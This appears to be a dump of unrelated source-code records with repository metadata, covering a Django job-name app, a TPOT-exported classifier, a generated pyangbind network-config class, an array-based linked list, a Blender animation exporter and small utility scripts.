subparsers = parser.add_subparsers(help="Available commands")
command_parsers = {}
for name in ["list", "search", "to_dicom", "to_nifti", "diffusion_scheme"]:
command = getattr(commands, name)
subparser = command.setup(subparsers)
subparser.add_argument(
"--verbosity", "-v", dest="child_verbosity",
choices=["warning", "info", "debug"], default="warning")
subparser.set_defaults(action=command.action)
command_parsers[command.action] = subparser
arguments = vars(parser.parse_args())
if "action" not in arguments:
parser.print_help()
return 1
main_verbosity = arguments.pop("main_verbosity").upper()
child_verbosity = arguments.pop("child_verbosity").upper()
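    # logging levels are ordered DEBUG < INFO < WARNING, so min() keeps the
    # most verbose of the two settings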
verbosity = min(
[getattr(logging, x) for x in [main_verbosity, child_verbosity]])
logging.basicConfig(
level=verbosity,
format="%(levelname)s - %(name)s: %(message)s")
action = arguments.pop("action")
try:
action(**arguments)
except Exception as e:
if verbosity == logging.DEBUG:
raise
else:
command_parsers[action].error(e)
if __name__ == "__main__":
sys.exit(main())
| [
"[email protected]"
] | |
1b103e18ecb604e87e2f579cf645558421707b91 | 8690ca0028c54b62d68badf1753fc6151ae03525 | /Part3 Levels of Aggregation/fse_data/AllROIs/tpot_mnist_pipeline_triangulateAggregationLevelParticipantSplitaggr_2_groups4.py | 7d1fc2a6145b7665e8206ac0c752c83a15062340 | [] | no_license | brains-on-code/conducting-and-analyzing-human-studies | fd74ee77fdc56cc61bdc1e0cf9bf423780f5dddc | 548e7443f4d2bdb2db1f2858289b7d3518593c59 | refs/heads/master | 2021-06-26T21:30:56.386121 | 2020-12-22T13:49:16 | 2020-12-22T13:49:16 | 195,975,817 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 830 | py | import numpy as np
import pandas as pd
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
# NOTE: Make sure that the class is labeled 'target' in the data file
tpot_data = pd.read_csv('PATH/TO/DATA/FILE', sep='COLUMN_SEPARATOR', dtype=np.float64)
features = tpot_data.drop('target', axis=1).values
training_features, testing_features, training_target, testing_target = \
train_test_split(features, tpot_data['target'].values, random_state=42)
# Score on the training set was: 1.0
exported_pipeline = RandomForestClassifier(bootstrap=False, criterion="gini", max_features=0.6500000000000001, min_samples_leaf=8, min_samples_split=6, n_estimators=100)
exported_pipeline.fit(training_features, training_target)
results = exported_pipeline.predict(testing_features)
| [
"[email protected]"
] | |
5594d738155165df35681f20b39b82b9a8c92c1f | c9ab605cdd2dbf92c9de05768ade0ecf1718be02 | /03_Django/04_django_crud_review/jobs/views.py | 92e5f3400502a07e8cddaa907118983276b91bed | [] | no_license | PyeongGang-Kim/TIL | 42d69308cf99d2e07644b51d7636e1b64551a697 | 8711501d131ee7d78fdaac544dda2008adf820a1 | refs/heads/master | 2023-01-12T21:10:38.027946 | 2021-10-23T07:19:48 | 2021-10-23T07:19:48 | 195,937,990 | 10 | 1 | null | 2023-01-07T11:25:30 | 2019-07-09T05:22:45 | HTML | UTF-8 | Python | false | false | 2,489 | py | from django.shortcuts import render
from .models import Job
from faker import Faker
from decouple import config
import requests
from IPython import embed
from pprint import pprint
# Create your views here.
def index(request):
return render(request, 'jobs/index.html')
def past_life(request):
name = request.POST.get('name')
person = Job.objects.filter(name=name).first()
if person:
past_job = person.past_job
else:
fake = Faker()
past_job = fake.job()
person = Job(name=name, past_job=past_job)
person.save()
# GIPHY
#1. Get the API key
GIPHY_API_KEY = config('GIPHY_API_KEY')
url = 'http://api.giphy.com/v1/gifs/search?api_key={}&q={}&limit=1&'.format(GIPHY_API_KEY, past_job)
data = requests.get(url).json()
image = data.get('data')[0].get('images').get('original').get('url')
# Naver image
#1 Prepare the request header info
headers = {
'X-Naver-Client-Id': config('NAVER_ID'),
'X-Naver-Client-Secret': config('NAVER_SECRET')
}
#2 Prepare the request url
url2 = 'https://openapi.naver.com/v1/search/image?query='+past_job+'&filter=medium&display=1'
#3 Send the request
naver_image = requests.get(url2, headers=headers).json().get('items')[0].get('link')
context = {'person': person, 'image': image, 'naver_image': naver_image}
return render(request, 'jobs/past_life.html', context)
# try:
# name = request.POST.get('name')
# job = Job.objects.get(name=name)
#     # set up the request url
# try:
# image = requets.get(url).json().
# except:
# image = None
# context = {
# 'past_life': job.past_job,
# 'name': name,
# 'image': image,
# }
# embed()
# return render(request, 'jobs/past_life.html', context)
# except:
# fake = Faker()
# job = Job(name=name, past_job=fake.job())
# job.save()
# url = 'http://api.giphy.com/v1/gifs/search?api_key=' + GIPHY_API_KEY + '&q='+job.past_job+'&limit=1'
# try:
# image = requets.get(url).json().get('data')[0].get('images').get('original').get('url')
# except:
# image = None
# context = {
# 'past_life': job.past_job,
# 'name': name,
# 'image': image,
# }
# return render(request, 'jobs/past_life.html', context) | [
"[email protected]"
] | |
51849e9e5ed14906063e583aaea90f63365bc874 | 51f887286aa3bd2c3dbe4c616ad306ce08976441 | /pybind/nos/v6_0_2f/mac/access_list/extended/__init__.py | 67d76ccc440658bdb11c3eea1c1eb7f28e382ffa | [
"Apache-2.0"
] | permissive | b2220333/pybind | a8c06460fd66a97a78c243bf144488eb88d7732a | 44c467e71b2b425be63867aba6e6fa28b2cfe7fb | refs/heads/master | 2020-03-18T09:09:29.574226 | 2018-04-03T20:09:50 | 2018-04-03T20:09:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,533 | py |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import hide_mac_acl_ext
class extended(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-mac-access-list - based on the path /mac/access-list/extended. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__name','__hide_mac_acl_ext',)
_yang_name = 'extended'
_rest_name = 'extended'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__name = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z0-9]{1}([-a-zA-Z0-9_]{0,62})', 'length': [u'1..63']}), is_leaf=True, yang_name="name", rest_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'ACL_NAME;; Access List Name (Max 63)'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='mac-acl-name', is_config=True)
self.__hide_mac_acl_ext = YANGDynClass(base=hide_mac_acl_ext.hide_mac_acl_ext, is_container='container', presence=False, yang_name="hide-mac-acl-ext", rest_name="", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'hidden': u'wyser-write-hook'}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'mac', u'access-list', u'extended']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'mac', u'access-list', u'extended']
def _get_name(self):
"""
Getter method for name, mapped from YANG variable /mac/access_list/extended/name (mac-acl-name)
"""
return self.__name
def _set_name(self, v, load=False):
"""
Setter method for name, mapped from YANG variable /mac/access_list/extended/name (mac-acl-name)
If this variable is read-only (config: false) in the
source YANG file, then _set_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_name() directly.
"""
parent = getattr(self, "_parent", None)
if parent is not None and load is False:
raise AttributeError("Cannot set keys directly when" +
" within an instantiated list")
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z0-9]{1}([-a-zA-Z0-9_]{0,62})', 'length': [u'1..63']}), is_leaf=True, yang_name="name", rest_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'ACL_NAME;; Access List Name (Max 63)'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='mac-acl-name', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """name must be of a type compatible with mac-acl-name""",
'defined-type': "brocade-mac-access-list:mac-acl-name",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z0-9]{1}([-a-zA-Z0-9_]{0,62})', 'length': [u'1..63']}), is_leaf=True, yang_name="name", rest_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'ACL_NAME;; Access List Name (Max 63)'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='mac-acl-name', is_config=True)""",
})
self.__name = t
if hasattr(self, '_set'):
self._set()
def _unset_name(self):
self.__name = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z0-9]{1}([-a-zA-Z0-9_]{0,62})', 'length': [u'1..63']}), is_leaf=True, yang_name="name", rest_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'ACL_NAME;; Access List Name (Max 63)'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='mac-acl-name', is_config=True)
def _get_hide_mac_acl_ext(self):
"""
Getter method for hide_mac_acl_ext, mapped from YANG variable /mac/access_list/extended/hide_mac_acl_ext (container)
"""
return self.__hide_mac_acl_ext
def _set_hide_mac_acl_ext(self, v, load=False):
"""
Setter method for hide_mac_acl_ext, mapped from YANG variable /mac/access_list/extended/hide_mac_acl_ext (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_hide_mac_acl_ext is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_hide_mac_acl_ext() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=hide_mac_acl_ext.hide_mac_acl_ext, is_container='container', presence=False, yang_name="hide-mac-acl-ext", rest_name="", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'hidden': u'wyser-write-hook'}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """hide_mac_acl_ext must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=hide_mac_acl_ext.hide_mac_acl_ext, is_container='container', presence=False, yang_name="hide-mac-acl-ext", rest_name="", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'hidden': u'wyser-write-hook'}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='container', is_config=True)""",
})
self.__hide_mac_acl_ext = t
if hasattr(self, '_set'):
self._set()
def _unset_hide_mac_acl_ext(self):
self.__hide_mac_acl_ext = YANGDynClass(base=hide_mac_acl_ext.hide_mac_acl_ext, is_container='container', presence=False, yang_name="hide-mac-acl-ext", rest_name="", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'hidden': u'wyser-write-hook'}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='container', is_config=True)
name = __builtin__.property(_get_name, _set_name)
hide_mac_acl_ext = __builtin__.property(_get_hide_mac_acl_ext, _set_hide_mac_acl_ext)
_pyangbind_elements = {'name': name, 'hide_mac_acl_ext': hide_mac_acl_ext, }
| [
"[email protected]"
] | |
8d8bd2733afc957d19afad643b783047d417c231 | b40fbe6d0012a299b0e771d2e5f0cfca3fe5be2b | /gen_bulk.py | f4fad52f721f76c134105cc0a87572a95af0cbb3 | [] | no_license | olimpiadi-informatica/randomtex | e8555776daa3761b6014cdf006b9c903db7f0fb2 | 1da019715c44db6a51135cb02dbf5a4e52586a95 | refs/heads/main | 2023-04-14T15:15:25.641932 | 2021-04-26T13:57:47 | 2021-04-26T14:13:03 | 358,237,479 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,612 | py | #!/usr/bin/env python3
import argparse
import csv
import datetime
import json
import logging
import multiprocessing.dummy as mp
import os
import random
import shutil
import tempfile
import progressbar
import compilation
import utils
progressbar.streams.wrap_stderr()
logger = logging.getLogger("gen_bulk")
def process_user(user, args, work_dir):
contest_dir = args.contest_dir
rnd = random.Random(int(user["seed"]))
tex, sol, order = utils.render_contest(contest_dir, rnd, context=user)
user["solutions"] = ":".join(sol)
user["questions_order"] = ":".join(map(str, order))
filename = user["filename"]
password = user["pdf_password"]
target = os.path.join(args.output_pdf, filename)
if os.path.exists(target):
logger.warning("File %s already present, skipping...", target)
return user
with tempfile.NamedTemporaryFile(prefix=filename) as f:
compilation.compile(tex, f.name, work_dir)
if args.no_enc:
shutil.move(f.name, target)
else:
logger.info("Encrypting PDF %s -> %s", f.name, target)
utils.encrypt_pdf(f.name, target, password)
return user
def generate(args, work_dir, users):
contest_dir = args.contest_dir
compilation.setup(contest_dir, work_dir)
os.makedirs(args.output_pdf, exist_ok=True)
def process(user):
return process_user(user, args, work_dir)
result = []
widgets = [
"[",
progressbar.SimpleProgress(),
" / ",
progressbar.Percentage(),
"] ",
progressbar.Bar(),
" ",
progressbar.Timer(),
" | ",
progressbar.AdaptiveETA(samples=datetime.timedelta(seconds=10)),
]
with mp.Pool(args.num_cores) as pool:
for res in progressbar.progressbar(
pool.imap_unordered(process, users),
max_value=len(users),
redirect_stdout=True,
widgets=widgets,
):
if res:
result.append(res)
headers = list(result[0].keys())
with open(args.output_csv, "w") as f:
writer = csv.DictWriter(f, headers)
writer.writeheader()
writer.writerows(result)
def main(args):
with open(args.users_csv) as f:
reader = csv.DictReader(f)
users = list(reader)
if args.work_dir:
generate(args, args.work_dir, users)
else:
with tempfile.TemporaryDirectory() as work_dir:
generate(args, work_dir, users)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--work-dir",
"-w",
help="Working directory for the compilation",
)
parser.add_argument(
"--num-cores",
"-j",
help="Number of parallel compilations",
type=int,
)
parser.add_argument("--verbose", "-v", help="Verbose output", action="store_true")
parser.add_argument("--no-enc", help="Do not encrypt the pdfs", action="store_true")
parser.add_argument("contest_dir", help="Directory with the contest")
parser.add_argument("users_csv", help="Path to the csv file with the students data")
parser.add_argument(
"output_pdf",
help="Directory of where to save the compiled pdf files",
)
parser.add_argument(
"output_csv",
help="Path where to save the CSV with the solutions",
)
args = parser.parse_args()
logging.basicConfig(
level=logging.DEBUG if args.verbose else logging.INFO,
format="%(asctime)s [%(levelname)s] [%(name)s] %(message)s",
)
main(args) | [
"[email protected]"
] | |
658f73dbac10be5eab3b65886b7d63510a3112a7 | 37f3759ca34f20d065ed62c9f892004f3468d869 | /first.py | 9aac5b66135641c05b038a41b8fab12fcb597621 | [] | no_license | cmc5953/cmc5953 | faf0d4d17714ffae10c1d9017b88734bb0f171ba | 76a33411ed305ffa2b5d312699f747591e4147ef | refs/heads/master | 2022-04-05T20:51:10.914382 | 2020-03-02T00:30:18 | 2020-03-02T00:30:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18 | py | print("firstfile") | [
"[email protected]"
] | |
f8938e7c7df3a92df60e420a4429cb058096a7e6 | 4be5c172c84e04c35677f5a327ab0ba592849676 | /python/data_structures/array/sll/sll.py | dbdb9af0a8277d797c590e960437f9b0ac88de97 | [] | no_license | niranjan-nagaraju/Development | 3a16b547b030182867b7a44ac96a878c14058016 | d193ae12863971ac48a5ec9c0b35bfdf53b473b5 | refs/heads/master | 2023-04-06T20:42:57.882882 | 2023-03-31T18:38:40 | 2023-03-31T18:38:40 | 889,620 | 9 | 2 | null | 2019-05-27T17:00:29 | 2010-09-05T15:58:46 | Python | UTF-8 | Python | false | false | 5,315 | py | '''
A SLL implemented using regular arrays
SLL corresponding to
78 -> 10 -> 41 -> 36 -> 21
is represented below
| Index | Node | Node |
| | data | next |
|-------+------+------|
| 0 | 10 | 7 |
| 1 | | |
| 2 | 36 | 9 |
| 3 | | |
| 4 | | |
head -> | 5 | 78 | 0 |
| 6 | | |
| 7 | 41 | 2 |
| 8 | | |
| 9 | 21 | -1 |
| 10 | | |
The underlying array for the SLL contains two disjoint lists
1. Available-list: contains a list of nodes that are available
2. Allocated-list: contains a list of nodes that are currently in use
'''
class SLL(object):
class Node(object):
def __init__(self, data=None, next=-1):
self.data = data
# next index == -1 implies there's no next link
self.next = next
def __repr__(self):
return str(self)
def __str__(self):
return str((self.data, self.next))
def __init__(self, capacity):
self.capacity = capacity
self._allocated = 0
# Initially all nodes are available
# chain them one-after-another sequentially
# into an available list
self._array = [SLL.Node(None, i+1) for i in xrange(self.capacity)]
self._array[-1].next = -1 # Tail of the available list
self.available_list = 0 # Index 0 is head of the available list
self.allocated_list = -1 # Allocated list is empty
self.allocated_tail = -1 # Allocated list is empty => tail: None
def __len__(self):
return self._allocated
def __str__(self):
lStr = '[{}]: '.format(len(self))
head = self.allocated_list
while head != -1:
lStr += str(self._array[head].data) + " -> "
head = self._array[head].next
return lStr
# Return a free node, initialized to 'data' from the available list.
# if there are any
# Raises MemoryError if the entire capacity of the array is currently allocated
def getNode(self, data):
if self.available_list == -1:
raise MemoryError("Linked list is at capacity")
node = self.available_list
self.available_list = self._array[self.available_list].next
self._array[node].next = -1
self._array[node].data = data
self._allocated += 1
return node
# Add a node back to the available list
def freeNode(self, node):
self._allocated -= 1
# blank data corresponding to the 'freed' node
# so all the nodes in the available list
# are blank signifying they are all re-usable containers
self._array[node].data = None
self._array[node].next = self.available_list
self.available_list = node
# Insert a node to the end of the SLL
def push_back(self, data):
# get a freenode from the available list
node = self.getNode(data)
if self.allocated_list == -1:
self.allocated_list = self.allocated_tail = node
return
self._array[self.allocated_tail].next = node
self.allocated_tail = node
# Insert a node at the front to the SLL
def push_front(self, data):
# get a freenode from the available list
node = self.getNode(data)
self._array[node].next = self.allocated_list
self.allocated_list = node
if self.allocated_tail == -1:
# First node being added to the SLL
# update tail
self.allocated_tail = node
# Remove a node from the front of the SLL
def pop_front(self):
if self.allocated_list == -1:
# Nothing to pop, list is empty
return None
node = self.allocated_list
data = self._array[node].data
self.allocated_list = self._array[self.allocated_list].next
if self.allocated_list == -1:
self.allocated_tail = -1
self.freeNode(node)
return data
# Remove a node from the end of the SLL
	def pop_back(self):
		if self.allocated_list == -1:
			# Nothing to pop, list is empty
			return None
		data = self._array[self.allocated_tail].data
		if self.allocated_list == self.allocated_tail:
			# There's only one node in the SLL
			self.freeNode(self.allocated_tail)
			self.allocated_tail = self.allocated_list = -1
			return data
		# Walk from the head to the node just before the tail
		node = self.allocated_list
		while self._array[node].next != self.allocated_tail:
			node = self._array[node].next
		self.freeNode(self.allocated_tail)
		self._array[node].next = -1
		self.allocated_tail = node
		return data
# Place 'data' in the SLL in its rightful place
# Uses cmp(data, x) {x: for each item in the SLL}
# Inserting only using 'place()' into the SLL will leave the SLL sorted
def place(self, data):
# get a freenode from the available list
node = self.getNode(data)
if self.allocated_list == -1:
self.allocated_list = self.allocated_tail = node
return
if data < self._array[self.allocated_list].data:
# current data is < everything in the SLL
self._array[node].next = self.allocated_list
self.allocated_list = node
return
if data >= self._array[self.allocated_tail].data:
# current data is > everything in the SLL
self._array[self.allocated_tail].next = node
self.allocated_tail = node
return
tmp = self.allocated_list
prev = None
while tmp != -1 and self._array[tmp].data <= data:
prev = tmp
tmp = self._array[tmp].next
# At this point, We have found a rightful place to insert current node
# prev is node after which 'data' needs to be inserted
self._array[prev].next = node
self._array[node].next = tmp
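# Illustrative usage sketch (added, not part of the original module):
# exercises the array-backed SLL above using only methods defined here.
if __name__ == '__main__':
	sll = SLL(5)
	sll.push_back(10)       # 10
	sll.push_front(78)      # 78 -> 10
	sll.push_back(41)       # 78 -> 10 -> 41
	print(sll)              # [3]: 78 -> 10 -> 41 ->
	print(sll.pop_front())  # 78
	print(sll.pop_back())   # 41
	print(sll)              # [1]: 10 ->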
| [
"[email protected]"
] | |
2553bc5ec831453cc73c3732fdbffe014c7cf7ce | e82b761f53d6a3ae023ee65a219eea38e66946a0 | /All_In_One/addons/mc-animation-blender/operator_anim_export.py | 503e83160184e749fd854f38b8b1ff3864169f8f | [] | no_license | 2434325680/Learnbgame | f3a050c28df588cbb3b14e1067a58221252e2e40 | 7b796d30dfd22b7706a93e4419ed913d18d29a44 | refs/heads/master | 2023-08-22T23:59:55.711050 | 2021-10-17T07:26:07 | 2021-10-17T07:26:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,913 | py | import bpy
import math
import json
# ExportHelper is a helper class, defines filename and
# invoke() function which calls the file selector.
from bpy_extras.io_utils import ExportHelper
from bpy.props import StringProperty, BoolProperty, EnumProperty
from bpy.types import Operator
class operator_anim_export(Operator, ExportHelper):
"""This appears in the tooltip of the operator and in the generated docs"""
bl_idname = "mcanim.export" # important since its how bpy.ops.import_test.some_data is constructed
bl_label = "Export Minecraft Animation (.mcanim)"
# ExportHelper mixin class uses this
filename_ext = ".mcanim"
filter_glob = StringProperty(
default="*.mcanim",
options={'HIDDEN'},
maxlen=255, # Max internal buffer length, longer would be clamped.
)
# List of operator properties, the attributes will be assigned
# to the class instance from the operator settings before calling.
looping = BoolProperty(
name="Looping",
description="Should this animation loop?",
default=True,
)
resetWhenDone = BoolProperty(
name="Reset when done",
description="Should this reset to starting position when done?",
default=False,
)
id = StringProperty(
name="ID",
description="Unique numerical ID that Minecraft will refer to this animation by",
default='0',
)
def execute(self, context):
return export(context, self.id, self.looping, self.resetWhenDone, self.filepath)
# specific export function for menu
def export(context, id, looping, resetWhenDone, path):
return write_mcanim(context, context.scene.objects.active, int(id), looping, resetWhenDone, path)
# write animation to disk
def write_mcanim(context, object, id, looping, resetWhenDone, path):
frames = []
# output all frames into frames array
for i in range(context.scene.frame_start, context.scene.frame_end):
frames.append(write_frame(context,object,i))
# add additional metadata to file
output = {
"version": "0.2",
"id": id,
"looping": looping,
"resetPos": resetWhenDone,
"frames": frames
}
# create json string
formatted = json.dumps(output, sort_keys=True, indent=4, separators=(',', ': '))
# output to file
file = open(path, "w")
file.write(formatted)
    file.close()
print("Outputted to: "+path)
return {'FINISHED'}
# returns a dictionary with a single frame of animation
def write_frame(context, object, frame):
# make sure we're on the right frame
context.scene.frame_set(frame)
# get all the bones in the armature
bones = object.pose.bones
# get values from said bones
body = convert_array(get_rotation(bones['body']), False)
left_arm = convert_array(get_rotation(bones['left_arm']), False)
right_arm = convert_array(get_rotation(bones['right_arm']), False)
left_leg = convert_array(get_rotation(bones['left_leg']), False)
right_leg = convert_array(get_rotation(bones['right_leg']), False)
head = convert_array(get_rotation(bones['head']), True)
location = [round(bones['root'].location[0], 2), round(bones['root'].location[1], 2), round(bones['root'].location[2], 2)]
rotation = round(math.degrees(get_rotation(bones['root'])[1]), 2)
# output found values to dictionary
output = {
"body": body,
"left_arm": left_arm,
"right_arm": right_arm,
"left_leg": left_leg,
"right_leg": right_leg,
"head": head,
"location": location,
"rotation": rotation
}
return output
# returns the rotation in euler, no matter what it was initially in
def get_rotation(input):
if input.rotation_mode == 'QUATERNION':
return input.rotation_quaternion.to_euler()
else:
return input.rotation_euler
# takes an array attained by armature.pose.bones[bone].rotation_euler, converts it to degrees, and does correct formulas.
def convert_array(array, isHead):
if isHead:
new_array = [array[0]*-1, array[1]*-1, array[2]]
else:
new_array = [array[2], array[1], array[0]*-1]
new_array[0] = round(math.degrees(new_array[0]), 2)
new_array[1] = round(math.degrees(new_array[1]), 2)
new_array[2] = round(math.degrees(new_array[2]), 2)
return new_array
# Only needed if you want to add into a dynamic menu
def menu_func_export(self, context):
self.layout.operator(operator_anim_export.bl_idname, text="Minecraft Animation (.mcanim)")
def register():
bpy.types.INFO_MT_file_export.append(menu_func_export)
def unregister():
bpy.types.INFO_MT_file_export.remove(menu_func_export)
if __name__ == "__main__":
register()
| [
"[email protected]"
] | |
5270fd8590b0db70b57d80c3f96aa6bf2f4b6bb5 | 1ece2cecace68fb1f8879fbe705f615256bba77d | /src/web_mirror/_constants.py | b785a9cd9ad8586bd46d47fcfd619ae9946bece2 | [
"MIT"
] | permissive | nuuuwan/web_mirror | 7ac07d5ed2f11f2dc57bb5c3641311f08d6ffca7 | 52330f9869a2fbb95a9f5309d58e5d5953e6a693 | refs/heads/main | 2023-07-16T17:17:39.219621 | 2021-09-04T06:36:15 | 2021-09-04T06:36:15 | 402,963,316 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 65 | py | """Constants."""
CACHE_NAME = 'web_mirror'
CACHE_TIMEOUT = 3600
| [
"[email protected]"
] | |
936b3abfafeee8de92355161e81f2cf35625caf2 | 2d8d7fef8f914f1b2337ee5d6a2e7c61dab9ec4e | /基础知识/1.语法基础/13.dict字典-增删改查.py | 8ea74ff8b009cb80334f8c2c6f4eb2ba593b1051 | [] | no_license | kuaikang/python3 | bb5bb8d807c4a8818b18f0d4e598232cc73ab3af | 60ca72662c7a6e718190ffa6139a129c1412a3fb | refs/heads/master | 2021-04-28T10:32:25.416550 | 2018-07-06T01:59:47 | 2018-07-06T01:59:47 | 122,068,697 | 13 | 11 | null | null | null | null | UTF-8 | Python | false | false | 658 | py | print("字典是key-value的数据类型".center(50, "-"))
print("字典是无序的,key不能重复")
info = {"stu1": "tom", "stu2": "jack", "stu3": "lucy"}
print(info)
# add
info["stu4"] = "bob"
# update
info["stu1"] = "zhang"
# delete
# info.pop("stu2")  # the standard way to delete
# del info["stu3"]
# lookup
print('-----', info.get("stu11"))  # returns None when the key doesn't exist
# print(info["stu0"])  # raises KeyError when the key doesn't exist
print(info)
print()
import sys
for key in info.keys():
sys.stdout.write(key + " ")
print()
for val in info.values():
sys.stdout.write(val + " ")
print()
for key, val in info.items():
sys.stdout.write(key + "-->" + val + " ")
| [
"[email protected]"
] | |
9b1336a598319774d6c7b2b0860e876c933a8cbc | c1fe97208afe479b7ae1ee67d69866a6911564ca | /Login/profilecreate/forms.py | 99f047fe4e0523e89dce7b7d71637698624e0c1c | [] | no_license | jaindhairyahere/Python_Django | a0a46c57b6ca60d0942ae181fe28ea56bb1ee948 | f170a2e38b78df698a02821a454a3baea0c358a6 | refs/heads/master | 2020-06-18T09:17:56.364928 | 2019-11-02T18:34:12 | 2019-11-02T18:34:12 | 196,249,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 633 | py | from django import forms
from django.contrib.auth.admin import User
from .models import Alumni
from django.core import validators
def check_PhoneNumber(value):
if len(value) != 10:
raise forms.ValidationError("Not a phone Number")
class UserForm(forms.ModelForm):
password = forms.CharField(widget = forms.PasswordInput())
class Meta():
model = User
fields = ('username','email','password',)
class AlumniForm(forms.ModelForm):
class Meta():
model = Alumni
exclude = ('user_model',)
class LoginForm(forms.Form):
username = forms.CharField(max_length=264)
password = forms.CharField(widget = forms.PasswordInput())
| [
"[email protected]"
] | |
e946bbe4ccbf8914231a25812913ff77829d1f28 | 545afb3cfe89f82b558faa5b5b28c28b8e3effce | /venv/Lib/site-packages/grpc/_plugin_wrapping.py | 6c925826d6f4cb8b3a86acd5ac23cf15ebe0b1e0 | [
"MIT"
] | permissive | parthpankajtiwary/keras-groundup | 24ad45a4b872e6d77fff8a6f4a3a6d60124a0628 | 0df0844e7d9dca741fad0965761a12f72ee51f07 | refs/heads/master | 2022-11-09T22:34:35.716466 | 2019-10-01T11:01:59 | 2019-10-01T11:01:59 | 210,914,101 | 0 | 1 | MIT | 2022-10-25T06:47:55 | 2019-09-25T18:31:49 | Python | UTF-8 | Python | false | false | 3,527 | py | # Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import logging
import threading
import grpc
from grpc import _common
